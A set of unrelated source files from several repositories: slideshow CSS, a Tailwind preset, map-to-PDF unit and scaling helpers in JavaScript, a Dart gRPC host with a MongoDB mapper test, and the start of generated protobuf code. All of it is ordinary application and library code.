-o-transition: all 0.2s ease-in-out;
transition: all 0.2s ease-in-out; }
.slick .slick-bottom .slick-no .skip:hover, .slick .slick-bottom .slick-no .skip:active, .slick .slick-bottom .slick-no .skip:focus {
background: #DDD;
color: black;
outline: none;
-webkit-transition: all 0.2s ease-in-out;
-moz-transition: all 0.2s ease-in-out;
-ms-transition: all 0.2s ease-in-out;
-o-transition: all 0.2s ease-in-out;
transition: all 0.2s ease-in-out; }
.slick .slick-bottom .slick-no .fullscr {
padding-left: 10px;
width: 20px;
cursor: pointer;
opacity: 0.7;
-webkit-transition: opacity 0.2s ease-in-out;
-moz-transition: opacity 0.2s ease-in-out;
-ms-transition: opacity 0.2s ease-in-out;
-o-transition: opacity 0.2s ease-in-out;
transition: opacity 0.2s ease-in-out; }
.slick .slick-bottom .slick-no .fullscr:hover {
opacity: 1;
-webkit-transition: opacity 0.2s ease-in-out;
-moz-transition: opacity 0.2s ease-in-out;
-ms-transition: opacity 0.2s ease-in-out;
-o-transition: opacity 0.2s ease-in-out;
transition: opacity 0.2s ease-in-out; }
.slick .slick-bottom .slick-no div {
float: left;
font-size: 0.9em; }
.slick .slick-bottom .slick-no div:nth-child(1) span {
padding-left: 3px; }
.slick .length {
height: 1px;
width: 37%;
background: #7F8C8D; }
.slick .overlay-controls .overlay-next {
height: calc(100% - 35px);
width: 50%;
display: block;
position: absolute;
top: 0;
right: 0; }
.slick .overlay-controls .overlay-prev {
height: calc(100% - 35px);
width: 50%;
display: block;
position: absolute;
top: 0;
left: 0; }
.fullscreen {
width: initial;
border: none;
box-shadow: none; }
.fullscreen .slick-content {
width: initial;
height: calc(100% - 35px); }
.fullscreen .slick-content img {
width: initial;
height: 100%; }
.fullscreen .length {
height: 2px; }
| srerrereal/rafa0elreal |
<|start_filename|>resources/stubs/tailwindcss/2.0/tall-forms-preset.js<|end_filename|>
const defaultTheme = require('tailwindcss/defaultTheme');
module.exports = {
purge: {
content: [
'./app/**/*.php',
//if Jetstream
'./vendor/laravel/jetstream/**/*.blade.php',
//if Jetstream and Breeze
'./vendor/laravel/framework/src/Illuminate/Pagination/resources/views/*.blade.php',
'./storage/framework/views/*.php',
// Tall-forms
'./config/tall-forms.php',
'./vendor/tanthammar/tall-forms/**/*.php',
'./vendor/tanthammar/tall-forms-sponsors/**/*.php',
// File formats applicable to most projects
'./resources/**/*.html',
'./resources/**/*.js',
'./resources/**/*.jsx',
'./resources/**/*.ts',
'./resources/**/*.tsx',
'./resources/**/*.php',
'./resources/**/*.vue',
'./resources/**/*.twig',
],
options: {
defaultExtractor: (content) => content.match(/[^<>"'`\s]*[^<>"'`\s:]/g) || [],
safelist: [/-active$/, /-enter$/, /-leave-to$/, /show$/],
},
},
theme: {
extend: {
fontFamily: {
sans: ['Nunito', ...defaultTheme.fontFamily.sans],
},
colors: {
//missing TWv1x colors
teal: {
100: '#e6fffa',
200: '#b2f5ea',
300: '#81e6d9',
400: '#4fd1c5',
500: '#38b2ac',
DEFAULT: '#38b2ac',
600: '#319795',
700: '#2c7a7b',
800: '#285e61',
900: '#234e52',
},
},
},
},
variants: {
extend: {
opacity: ['responsive', 'hover', 'focus', 'disabled'],
},
},
plugins: [
require('@tailwindcss/typography'),
require('@tailwindcss/forms'),
require('@tailwindcss/aspect-ratio'),
],
};
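// Illustrative usage sketch (assumption, not part of this stub): a Tailwind preset like this
// is normally consumed from a project's own tailwind.config.js through the `presets` key;
// the require path below is a placeholder.
//
//   // tailwind.config.js
//   module.exports = {
//     presets: [require('./tall-forms-preset')],
//     // project-specific theme/variant overrides can be layered on top here
//   };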
| ziming/tall-forms |
<|start_filename|>js/dimensions.js<|end_filename|>
/*
* Mapbox Print Pdf - Printing PDFs with high resolution mapbox maps
* Copyright (c) 2018 <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
var check = require('./type-check.js');
var UNITS = {
Points: 'pt',
Pixels: 'px',
Inches: 'in',
Millimeters: 'mm',
Centimeters: 'cm'
};
UNITS.Enumerated = [UNITS.Points, UNITS.Pixels, UNITS.Inches, UNITS.Millimeters, UNITS.Centimeters];
function isValidPDFUnit(value) {
return check.isString(value) && value !== UNITS.Pixels && UNITS.Enumerated.indexOf(value) !== -1;
}
var Dimens = (function () {
var IN_TO_CM = 2.54;
var IN_TO_MM = 10 * IN_TO_CM;
var IN_TO_PT = 72;
var IN_TO_PX = 96;
var _toInches = function (value, unit) {
if (unit === UNITS.Inches) return value;
if (unit === UNITS.Centimeters) return value / IN_TO_CM;
if (unit === UNITS.Millimeters) return value / IN_TO_MM;
if (unit === UNITS.Points) return value / IN_TO_PT;
if (unit === UNITS.Pixels) return value / IN_TO_PX;
console.error('Unrecognized unit: ' + unit);
return -1;
};
var _isValidDimensionObject = function (obj) {
if (!check.isObject(obj)) return false;
if (!obj.hasOwnProperty('width') || !obj.hasOwnProperty('height') || !obj.hasOwnProperty('unit')) return false;
if (!check.isNumber(obj.width) || !check.isNumber(obj.height) || !check.isString(obj.unit)) return false;
if (obj.width < 0 || obj.height < 0 || UNITS.Enumerated.indexOf(obj.unit) == -1) return false;
return true;
};
var _isValidPdfDimensionObject = function (obj) {
if (!_isValidDimensionObject(obj) || !isValidPDFUnit(obj.unit)) return false;
return true;
};
var _toDimension = function (obj) {
if (obj instanceof Dimens) return obj;
if (!_isValidDimensionObject(obj)) return null;
return new Dimens(obj.width, obj.height, obj.unit);
};
var _add = function (dimensOne, dimensTwo) {
dimensTwo = dimensTwo.to(dimensOne.unit());
return new Dimens(dimensOne.width() + dimensTwo.width(),
dimensOne.height() + dimensTwo.height(), dimensOne.unit());
};
var _toPdfDimension = function (obj) {
if (!_isValidPdfDimensionObject(obj)) return null;
if (obj instanceof Dimens) return obj;
return new Dimens(obj.width, obj.height, obj.unit);
};
var _subtractMargin = function (dimensions, margins) {
var convMargins = margins.to(dimensions.unit());
return new Dimens(dimensions.width() - convMargins.left() - convMargins.right(),
dimensions.height() - convMargins.top() - convMargins.bottom(), dimensions.unit());
};
var _to = function (value, unitFrom, unitTo) {
if (unitFrom === unitTo) return value;
value = _toInches(value, unitFrom);
if (value === -1) return value;
if (unitTo === UNITS.Inches) return value;
if (unitTo === UNITS.Centimeters) return value * IN_TO_CM;
if (unitTo === UNITS.Millimeters) return value * IN_TO_MM;
if (unitTo === UNITS.Points) return value * IN_TO_PT;
if (unitTo === UNITS.Pixels) return value * IN_TO_PX;
console.error('Unrecognized unit: ' + unitTo);
return -1;
};
var constructor = function (width, height, unit) {
this.to = function (unitTo) {
return new Dimens(Dimens.to(width, unit, unitTo), Dimens.to(height, unit, unitTo), unitTo);
};
this.toString = function () {
return 'width: ' + width + unit + '; height: ' + height + unit + ';';
};
this.subtractMargin = function (margin) {
return Dimens.subtractMargin(this, margin);
};
this.add = function (toAdd) {
return _add(this, toAdd);
};
this.area = function () {
return width * height;
};
this.sum = function () {
return width + height;
};
this.width = function () {
return width;
};
this.height = function () {
return height;
};
this.unit = function () {
return unit;
};
};
constructor.isValidDimensionObject = _isValidDimensionObject;
constructor.toDimension = _toDimension;
constructor.toPdfDimension = _toPdfDimension;
constructor.subtractMargin = _subtractMargin;
constructor.to = _to;
constructor.add = _add;
constructor.isValidPdfDimensionObject = _isValidPdfDimensionObject;
return constructor;
})();
var Margin = (function () {
var _isValidMargin = function (margin) {
if (check.isNumber(margin) && margin >= 0) return true;
if (!check.isObject(margin)) return false;
if (!margin.hasOwnProperty('top') || !margin.hasOwnProperty('bottom') ||
!margin.hasOwnProperty('right') || !margin.hasOwnProperty('left')) return false;
if ((!check.isNumber(margin.top) || margin.top < 0) ||
(!check.isNumber(margin.bottom) || margin.bottom < 0) ||
(!check.isNumber(margin.left) || margin.left < 0) ||
(!check.isNumber(margin.right) || margin.right < 0)) return false;
return true;
};
var _createPDFMargin = function (margin, unit) {
if (!isValidPDFUnit(unit) || !_isValidMargin(margin)) return null;
if (check.isNumber(margin)) {
return new Margin({
top: margin,
left: margin,
right: margin,
bottom: margin
}, unit);
} else {
var marg = new Margin(margin, unit);
return marg;
}
};
var constructor = function (margins, unit) {
var right = margins.right;
var left = margins.left;
var top = margins.top;
var bottom = margins.bottom;
this.to = function (toUnit) {
return new Margin({
right: Dimens.to(right, unit, toUnit),
left: Dimens.to(left, unit, toUnit),
top: Dimens.to(top, unit, toUnit),
bottom: Dimens.to(bottom, unit, toUnit),
}, toUnit);
};
this.top = function () {
return top;
};
this.left = function () {
return left;
};
this.right = function () {
return right;
};
this.bottom = function () {
return bottom;
};
this.toArray = function () {
return [top, left, bottom, right];
};
};
constructor.createPDFMargin = _createPDFMargin;
return constructor;
})();
var Size = function (value, unit) {
this.to = function (toUnit) {
return new Size(Dimens.to(value, unit, toUnit), toUnit);
};
this.value = function () {
return value;
};
this.unit = function () {
return unit;
};
};
Size.from = function (obj, valueProp) {
valueProp = valueProp ? valueProp : 'value';
if (!obj.hasOwnProperty(valueProp) || !obj.hasOwnProperty('unit')) return null;
if (!check.isNumber(obj[valueProp]) || obj[valueProp] < 0 || UNITS.Enumerated.indexOf(obj.unit) == -1) return null;
return new Size(obj[valueProp], obj.unit);
};
module.exports = {
Dimens: Dimens,
Margin: Margin,
Size: Size,
UNITS: UNITS
};
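// Illustrative usage sketch (assumption, not taken from the library's documentation):
//
//   var dims = require('./dimensions.js');
//   var a4 = new dims.Dimens(210, 297, dims.UNITS.Millimeters);
//   var margin = dims.Margin.createPDFMargin(10, dims.UNITS.Millimeters);
//   var printable = a4.subtractMargin(margin).to(dims.UNITS.Points);
//   console.log(printable.toString()); // printable area expressed in points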
<|start_filename|>js/format-config.js<|end_filename|>
var dimensions = require('./dimensions.js');
var Dimens = dimensions.Dimens;
var UNITS = dimensions.UNITS;
var FormatConfig = (function() {
var DEFAULT_FORMATS = {
'a0': new Dimens(2383.94, 3370.39, UNITS.Points),
'a1': new Dimens(1683.78, 2383.94, UNITS.Points),
'a2': new Dimens(1190.55, 1683.78, UNITS.Points),
'a3': new Dimens(841.89, 1190.55, UNITS.Points),
'a4': new Dimens(595.28, 841.89, UNITS.Points),
'a5': new Dimens(419.53, 595.28, UNITS.Points),
'a6': new Dimens(297.64, 419.53, UNITS.Points),
'a7': new Dimens(209.76, 297.64, UNITS.Points),
'a8': new Dimens(147.40, 209.76, UNITS.Points),
'a9': new Dimens(104.88, 147.40, UNITS.Points),
'a10': new Dimens(73.70, 104.88, UNITS.Points),
'b0': new Dimens(2834.65, 4008.19, UNITS.Points),
'b1': new Dimens(2004.09, 2834.65, UNITS.Points),
'b2': new Dimens(1417.32, 2004.09, UNITS.Points),
'b3': new Dimens(1000.63, 1417.32, UNITS.Points),
'b4': new Dimens(708.66, 1000.63, UNITS.Points),
'b5': new Dimens(498.90, 708.66, UNITS.Points),
'b6': new Dimens(354.33, 498.90, UNITS.Points),
'b7': new Dimens(249.45, 354.33, UNITS.Points),
'b8': new Dimens(175.75, 249.45, UNITS.Points),
'b9': new Dimens(124.72, 175.75, UNITS.Points),
'b10': new Dimens(87.87, 124.72, UNITS.Points),
'c0': new Dimens(2599.37, 3676.54, UNITS.Points),
'c1': new Dimens(1836.85, 2599.37, UNITS.Points),
'c2': new Dimens(1298.27, 1836.85, UNITS.Points),
'c3': new Dimens(918.43, 1298.27, UNITS.Points),
'c4': new Dimens(649.13, 918.43, UNITS.Points),
'c5': new Dimens(459.21, 649.13, UNITS.Points),
'c6': new Dimens(323.15, 459.21, UNITS.Points),
'c7': new Dimens(229.61, 323.15, UNITS.Points),
'c8': new Dimens(161.57, 229.61, UNITS.Points),
'c9': new Dimens(113.39, 161.57, UNITS.Points),
'c10': new Dimens(79.37, 113.39, UNITS.Points),
'dl': new Dimens(311.81, 623.62, UNITS.Points),
'letter': new Dimens(612, 792, UNITS.Points),
'government-letter': new Dimens(576, 756, UNITS.Points),
'legal': new Dimens(612, 1008, UNITS.Points),
'junior-legal': new Dimens(576, 360, UNITS.Points),
'ledger': new Dimens(1224, 792, UNITS.Points),
'tabloid': new Dimens(792, 1224, UNITS.Points),
'credit-card': new Dimens(153, 243, UNITS.Points)
};
var userFormats = {};
var _getFormats = function() {
var formatsCopy = {};
var format;
for (format in DEFAULT_FORMATS) {
if (DEFAULT_FORMATS.hasOwnProperty(format)) {
formatsCopy[format] = DEFAULT_FORMATS[format];
}
}
for (format in userFormats) {
if (userFormats.hasOwnProperty(format)) {
formatsCopy[format] = userFormats[format];
}
}
return formatsCopy;
};
var _isDefaultFormat = function(format) {
if (userFormats.hasOwnProperty(format)) return false;
return DEFAULT_FORMATS.hasOwnProperty(format);
};
var _formatExists = function(format) {
return userFormats.hasOwnProperty(format) || DEFAULT_FORMATS.hasOwnProperty(format);
};
var _addFormat = function(format, dimension) {
if (userFormats.hasOwnProperty(format)) return {
error: 'Format ' + format + ' already exists'
};
if (!Dimens.isValidPdfDimensionObject(dimension)) return {
error: 'Dimensions are of an invalid type'
};
userFormats[format] = Dimens.toPdfDimension(dimension);
return {
success: true
};
};
var _getFormat = function(format) {
if (userFormats.hasOwnProperty(format)) return userFormats[format];
if (DEFAULT_FORMATS.hasOwnProperty(format)) return DEFAULT_FORMATS[format];
console.error('The format ' + format + ' doesn\'t exist.');
return null;
};
return {
getFormats: _getFormats,
isDefaultFormat: function(format) {
return _isDefaultFormat(format.toLowerCase());
},
addFormat: function(format, dimension) {
return _addFormat(format.toLowerCase(), dimension);
},
getFormat: function(format) {
return _getFormat(format.toLowerCase());
},
formatExists: function(format) {
return _formatExists(format.toLowerCase());
}
};
})();
module.exports = FormatConfig;
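// Illustrative usage sketch (assumption, not taken from the library's documentation):
//
//   var FormatConfig = require('./format-config.js');
//   var UNITS = require('./dimensions.js').UNITS;
//   FormatConfig.addFormat('postcard', { width: 283.5, height: 416.7, unit: UNITS.Points });
//   var postcard = FormatConfig.getFormat('postcard'); // returns a Dimens instance, or null if unknown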
<|start_filename|>docs/css/index.css<|end_filename|>
html, body {
height: 100%;
}
#wrapper {
-webkit-transition: all 0.5s ease;
-moz-transition: all 0.5s ease;
-o-transition: all 0.5s ease;
transition: all 0.5s ease;
}
.fill-height {
min-height: 100%;
height: 100%;
}
.sidebar-wrapper {
overflow-y: auto;
background: #000;
-webkit-transition: all 0.5s ease;
-moz-transition: all 0.5s ease;
-o-transition: all 0.5s ease;
transition: all 0.5s ease;
}
#pdfViewer {
margin:0;
padding:0;
}
#map {
padding:0;
}
#pdfContainer {
padding:0;
overflow:hidden;
}
.progress-bar.animate {
width: 100%;
}
.sidebar-nav>.sidebar-brand {
height: 65px;
line-height: 60px;
text-align: center;
}
.sidebar-nav>.sidebar-brand a {
color: #999999;
}
label {
color: #999999;
}
.big-label {
font-size: 25px;
font-weight: bold;
}
.sidebar-nav>.sidebar-brand a:hover {
color: #fff;
background: none;
}
#printBtn {
float: right;
margin-bottom: 10px;
}
#resetBtn {
float:left;
margin-bottom: 10px;
}
<|start_filename|>js/scale-element.js<|end_filename|>
/*
* Mapbox Print Pdf - Printing PDFs with high resolution mapbox maps
* Copyright (c) 2018 <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
var check = require('./type-check.js');
var Dimens = require('./dimensions.js').Dimens;
var SUPPORTED_UNITS = ['px', 'pt', 'rem', 'cm', 'mm', 'in', 'pc'];
var ATTR_SCALE_WIDTH = 'data-scale-width';
var ATTR_SCALE_HEIGHT = 'data-scale-height';
var ATTR_SCALE_SUM = 'data-scale-sum';
var ATTR_HANDLER = 'data-scale-handler';
var UNITS_REGEX = makePropertyRegex(SUPPORTED_UNITS);
function toSnakeCase(str) {
return str.replace(/([A-Z])/g, '-$1').toLowerCase();
}
function toCamelCase(str) {
return str.replace(/-([a-z])/g, function (match) {
return match[1].toUpperCase();
});
}
function makePropertyRegex(units) {
return new RegExp('^(\\d+\\.?\\d*)(' + units.join('|') + ')$');
}
var StyleSize = (function(supportedUnits) {
var _constructor = function(values) {
this.scale = function(percent) {
for (var i = 0; i < values.length; ++i) {
if (check.isString(values[i]) || supportedUnits.indexOf(values[i].unit) === -1) continue;
values[i].size *= percent;
}
return this;
};
this.toString = function() {
var string = '';
for (var i = 0; i < values.length; ++i) {
if (i > 0) string += ' ';
if (check.isString(values[i])) {
string += values[i];
continue;
}
string += values[i].size + values[i].unit;
}
return string;
};
};
var _fromString = function(string, regex) {
var styleValues = string.split(' ');
var values = [];
var atLeastOneMatch = false;
for (var i = 0; i < styleValues.length; ++i) {
var match = regex.exec(styleValues[i]);
if (!match || match.length != 3) {
values.push(styleValues[i]);
continue;
}
atLeastOneMatch = true;
values.push({
size: Number(match[1]),
unit: match[2]
});
}
if (!atLeastOneMatch) return null;
return new _constructor(values);
};
return {
fromString: _fromString
};
})(SUPPORTED_UNITS);
function getStyle(elem) {
if (elem.currentStyle) {
return {
style: elem.currentStyle,
snakeCase: false
};
// other browsers
} else if (elem.ownerDocument.defaultView &&
elem.ownerDocument.defaultView.getComputedStyle) {
return {
style: elem.ownerDocument.defaultView.getComputedStyle(elem),
snakeCase: true
};
} else {
return null;
}
}
function scaleSingleElement(element, percent, properties, newStyles) {
var style = getStyle(element);
if (style) {
for (var i = 0; i < properties.length; ++i) {
var prop = properties[i];
var propValue = style.snakeCase ? style.style.getPropertyValue(toSnakeCase(prop)) : style.style[prop];
var scaleValue = StyleSize.fromString(propValue, UNITS_REGEX);
if (scaleValue) newStyles.push({
elem: element,
prop: prop,
value: scaleValue.scale(percent).toString()
});
}
}
}
function scaleByAttribute(element, attr, percent, newStyles) {
if(element.hasAttribute(attr)) {
var properties = toCamelCase(element.getAttribute(attr)).split(' ');
scaleSingleElement(element, percent, properties, newStyles);
}
}
function recursiveScale(element, handlers, scalingObj, newStyles) {
if (element.hasAttribute(ATTR_HANDLER)) {
var handler = element.getAttribute(ATTR_HANDLER);
if (handlers.hasOwnProperty(handler) && check.isFunction(handlers[handler])) {
var tmpStyles = handlers[handler](element, scalingObj);
if (check.isArray(tmpStyles)) newStyles.push.apply(newStyles, tmpStyles);
}
} else {
scaleByAttribute(element, ATTR_SCALE_WIDTH, scalingObj.widthRatio, newStyles);
scaleByAttribute(element, ATTR_SCALE_HEIGHT, scalingObj.heightRatio, newStyles);
scaleByAttribute(element, ATTR_SCALE_SUM, scalingObj.sumRatio, newStyles);
}
for (var i = 0; i < element.children.length; ++i) {
recursiveScale(element.children[i], handlers, scalingObj, newStyles);
}
}
function applyStyles(newStyles) {
for (var i = 0; i < newStyles.length; ++i) {
var style = newStyles[i];
style.elem.style[style.prop] = style.value;
}
}
function scaleElement(element, handlers, orgDimens, currentDimens) {
if (!check.isHTMLElement(element) || !(orgDimens instanceof Dimens) || !(currentDimens instanceof Dimens)) return;
currentDimens = currentDimens.to(orgDimens.unit());
var scalingObj = {original: orgDimens, current: currentDimens};
scalingObj.heightRatio = currentDimens.height()/orgDimens.height();
scalingObj.widthRatio = currentDimens.width()/orgDimens.width();
scalingObj.sumRatio = (currentDimens.sum())/(orgDimens.sum());
var newStyles = [];
recursiveScale(element, handlers, scalingObj, newStyles);
applyStyles(newStyles);
}
module.exports = scaleElement;
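// Illustrative usage sketch (assumption, not taken from the library's documentation): elements
// opt in to scaling through the data-scale-* attributes, and scaleElement rewrites the listed
// style properties in proportion to the change between the original and current dimensions.
//
//   <!-- <div id="header" data-scale-height="font-size line-height">...</div> -->
//
//   var scaleElement = require('./scale-element.js');
//   var dims = require('./dimensions.js');
//   scaleElement(
//     document.getElementById('header'),
//     {},                                                  // no custom data-scale-handler handlers
//     new dims.Dimens(210, 297, dims.UNITS.Millimeters),   // original format
//     new dims.Dimens(420, 594, dims.UNITS.Millimeters)    // current, larger format
//   );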
| MateusLehmkuhl/mapbox-print-pdf |
<|start_filename|>grpc_host/lib/src/hosting/host.dart<|end_filename|>
import 'dart:io';
import 'dart:isolate';
import 'package:grpc_host/grpc_host.dart';
abstract class Host<TAppSettings> {
Settings<TAppSettings> get settings;
final void Function(HostParameters<TAppSettings> message) entryPoint;
Host(this.entryPoint);
Future serve() async {
var hostSettings = settings.hostSettings;
var receivePort = ReceivePort();
var errorReceivePort = ReceivePort();
var hostParameters = HostParameters<TAppSettings>(
receivePort.sendPort,
settings,
);
var isolates = <Isolate>[];
final numberIsolates =
hostSettings.isolatesMultiplier * Platform.numberOfProcessors +
hostSettings.extraIsolates;
for (var i = 0; i < numberIsolates; i++) {
var isolate = await Isolate.spawn(entryPoint, hostParameters,
errorsAreFatal: false);
isolate.addErrorListener(errorReceivePort.sendPort);
isolates.add(isolate);
}
receivePort.listen((msg) {
print(msg);
});
errorReceivePort.listen((msg) {
stderr.writeln('ERROR $msg');
});
}
}
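// Illustrative sketch (assumption, not taken from the package documentation): a concrete host
// supplies its Settings and an isolate entry point that builds and serves the gRPC services.
// 'MySettings', 'myHostSettings' and 'myEntryPoint' are hypothetical placeholders.
//
//   class MyHost extends Host<MySettings> {
//     MyHost() : super(myEntryPoint);
//
//     @override
//     Settings<MySettings> get settings =>
//         Settings(myHostSettings, appSettings: MySettings());
//   }
//
//   void myEntryPoint(HostParameters<MySettings> parameters) {
//     // create the grpc Server with the services here and start listening
//   }
//
//   Future<void> main() => MyHost().serve();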
<|start_filename|>grpc_host/lib/src/services/entity_services.dart<|end_filename|>
import 'package:grpc/grpc.dart';
import 'package:grpc_host/grpc_host.dart';
import 'package:nosql_repository/nosql_repository.dart';
import 'package:squarealfa_entity_adapter/squarealfa_entity_adapter.dart';
class EntityServices<TEntity> extends AuthenticatedServices {
final Repository<TEntity> repository;
final MapMapper<TEntity> mapMapper;
final EntityPermissions permissions;
final Validator validator;
EntityServices(ServiceCall call, EntityServicesParameters<TEntity> parameters)
: repository = parameters.repository,
validator = parameters.validator,
permissions = parameters.permissions,
mapMapper = parameters.mapMapper,
super(call);
Future<Stream<Map<String, dynamic>>> findToStream([
SearchCriteria criteria = const SearchCriteria(),
]) async {
final result = await repository.searchToStream(criteria, principal);
return result;
}
Future<Stream<TEntity>> findToEntityStream([
SearchCriteria criteria = const SearchCriteria(),
]) async {
final mapStream = await findToStream(criteria);
final entityStream = mapStream.map((m) => mapMapper.fromMap(m));
return entityStream;
}
Future<List<TEntity>> findToEntityList([
SearchCriteria criteria = const SearchCriteria(),
]) async {
final stream = await findToStream(criteria);
    final list = await stream.map((m) => mapMapper.fromMap(m)).toList();
return list;
}
Future<PagedSearchResult<TEntity>> findToEntityPage(
SearchCriteria criteria, {
TEntity Function(Map<String, dynamic> map)? mapper,
}) async {
final searchResult = await repository.searchWithCount(criteria, principal);
mapper ??= mapMapper.fromMap;
var page = await searchResult.page.map((m) => mapper!(m)).toList();
final ret = PagedSearchResult(
count: searchResult.count,
page: page,
);
return ret;
}
Future<PagedSearchResult<TPageItem>> findPage<TPageItem>(
SearchCriteria criteria, {
required TPageItem Function(Map<String, dynamic> map) mapper,
}) async {
final searchResult = await repository.searchWithCount(criteria, principal);
var page = await searchResult.page.map((m) {
final entity = mapper(m);
return entity;
}).toList();
final ret = PagedSearchResult(
count: searchResult.count,
page: page,
);
return ret;
}
}
<|start_filename|>grpc_host/lib/src/configuration/settings.dart<|end_filename|>
import 'package:grpc_host/grpc_host.dart';
class Settings<TAppSettings> {
final HostSettings hostSettings;
final TAppSettings? appSettings;
Settings(
this.hostSettings, {
this.appSettings,
});
}
<|start_filename|>map_mapper/test_mongo/test/map_mapper_generator_test.dart<|end_filename|>
import 'package:decimal/decimal.dart';
import 'package:map_mapper_generator_test/map_mapper_generator_test.dart';
import 'package:map_mapper_generator_test/src/person.dart';
import 'package:mongo_dart/mongo_dart.dart';
import 'package:test/test.dart';
void main() {
group('keyhandler tests', () {
test('mongo key handler', () {
final recipe = _scrambledEggsRecipe();
final mongoMap = recipe.toMap();
final mrecipe = mongoMap.toRecipe();
expect(mrecipe.key, recipe.key);
expect(mrecipe.categoryKey, recipe.categoryKey);
expect(mrecipe.category.id, recipe.category.id);
expect(mrecipe.category.mainComponentId, recipe.category.mainComponentId);
expect(mrecipe.ingredients.first.key, recipe.ingredients.first.key);
expect(mrecipe.ingredients.first.mainComponentKey,
recipe.ingredients.first.mainComponentKey);
expect(mongoMap['_id'], ObjectId.fromHexString(recipe.key));
expect(
mongoMap['categoryId'], ObjectId.fromHexString(recipe.categoryKey));
expect(mongoMap['category']['_id'],
ObjectId.fromHexString(recipe.category.id));
expect(mongoMap['category']['mainComponentId'],
ObjectId.fromHexString(recipe.category.mainComponentId));
expect(mongoMap['ingredients'][0]['_id'],
ObjectId.fromHexString(recipe.ingredients.first.key));
expect(mongoMap['ingredients'][0]['mainComponentId'],
ObjectId.fromHexString(recipe.ingredients.first.mainComponentKey));
});
test('mongo key handler for entity', () {
final key = ObjectId.fromSeconds(5653324265).toHexString();
final person = Person(key: key, name: 'Alice');
final mongoMap = person.toMap();
final mperson = mongoMap.toPerson();
expect(mperson.key, person.key);
expect(mongoMap['_id'], ObjectId.fromHexString(person.key));
});
});
}
Category _eggsCategory({
Component? alternativeComponent,
List<Component>? secondaryComponents,
}) =>
Category(
id: ObjectId.fromSeconds(4343433).toHexString(),
mainComponentId: ObjectId.fromSeconds(87633323).toHexString(),
title: 'eggs',
mainComponent: Component(
description: 'category component',
),
otherComponents: [
Component(description: 'other category component 1'),
Component(description: 'other category component 2'),
],
alternativeComponent: alternativeComponent,
secondaryComponents: secondaryComponents,
);
Recipe _scrambledEggsRecipe({
  DateTime? expiryDate,
  Duration? totalDuration,
  bool? requiresRobot,
Component? alternativeComponent,
List<Component>? secondaryComponents,
Component? categoryAlternativeComponent,
List<Component>? categorySecondaryComponents,
ApplianceType? secondaryApplianceType,
List<String>? extraTags,
}) =>
Recipe(
category: _eggsCategory(
alternativeComponent: categoryAlternativeComponent,
secondaryComponents: categorySecondaryComponents,
),
key: ObjectId.fromSeconds(5653323465).toHexString(),
categoryKey: ObjectId.fromSeconds(576653323).toHexString(),
secondaryCategoryKey: ObjectId.fromSeconds(5653323465).toHexString(),
publishDate: DateTime(2021, 02, 05, 13, 15, 12),
expiryDate: expiryDate,
ingredients: [
Ingredient(
key: ObjectId.fromSeconds(73323465).toHexString(),
description: '',
quantity: Decimal.fromInt(0),
precision: 1202.067843212219876,
cookingDuration: Duration(),
mainComponentKey: ObjectId.fromSeconds(656434).toHexString(),
mainComponent: Component(
description: 'ingredient component',
),
otherComponents: [
Component(description: 'other ingredient component 1'),
Component(description: 'other ingredient component 2'),
],
alternativeComponent: alternativeComponent,
secondaryComponents: secondaryComponents,
),
],
title: 'Scrambled eggs',
preparationDuration: Duration(minutes: 23, seconds: 30),
totalDuration: totalDuration,
isPublished: true,
requiresRobot: requiresRobot,
mainApplianceType: ApplianceType.Cutlery,
secondaryApplianceType: secondaryApplianceType,
tags: ['tag1', 'tag2'],
extraTags: extraTags,
);
<|start_filename|>proto_mapper/test/lib/grpc/component.pb.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: component.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields
import 'dart:core' as $core;
import 'package:protobuf/protobuf.dart' as $pb;
class GComponent extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GComponent',
createEmptyInstance: create)
..aOS(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'description')
..hasRequiredFields = false;
GComponent._() : super();
factory GComponent({
$core.String? description,
}) {
final _result = create();
if (description != null) {
_result.description = description;
}
return _result;
}
factory GComponent.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GComponent.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
